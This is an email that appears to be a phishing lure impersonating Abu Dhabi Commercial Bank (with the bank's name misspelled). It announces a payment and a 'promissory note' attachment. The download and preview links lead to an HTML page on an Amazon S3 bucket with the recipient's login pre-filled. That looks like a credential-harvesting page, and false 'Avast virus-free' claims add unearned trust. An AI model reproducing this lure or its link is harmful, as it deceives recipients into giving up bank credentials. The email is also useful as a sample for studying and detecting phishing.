Subject: payment information
From: "ABU DHABI COMMERICAL BANK \( ADCB \)" <[email-masked]>
To: <[email-masked]>
Date: Mon, 4 Mar 2024 17:49:38 +0330

<https://rescdn.qqmail.com/bizmail/zh_CN/htmledition/images/icon_att087795
.gif> Annex (  1 )
Prmissory note (Scanned by the Avast cloud killing engine)
<https://rescdn.qqmail.com/bizmail/zh_CN/htmledition/images/spacer087795.g
if> Accessories preview
 
<https://exmail.qq.com/zh_CN/htmledition/images/xdisk/ico_mid/fu_pdf.gif> 
promissory_note.pdf  (232.30K) 
 
<https://oldsoilder.s3.ap-southeast-2.amazonaws.com/control_kpi.html?login
=[email-masked]&page=_adbe3&pcnt=3> Download to
<https://oldsoilder.s3.ap-southeast-2.amazonaws.com/control_kpi.html?login
=[email-masked]&page=_adbe3&pcnt=3> open the    preview

Good day,

Please find attached promissory note above, the payment will reflect on
you account in two working days depending on your bank.

Best Regards.

 ABU DHABI COMMERICAL BANK  ( ADCB )

--------------------------------------------------------------------------
------------------------------------------------------------------

This e-mail may contain confidential and/or privileged information.. The
information is intended for the addressee only. If you are not the
addressee, any disclosure, copy, distribution or use of the contents of
this message is prohibited. If you have received this electronic message
in error, please destroy the original message and all copies.

  _____  

This email has been sent from a virus-free computer protected by Avast.

www.avast.com <http://www.avast.com/>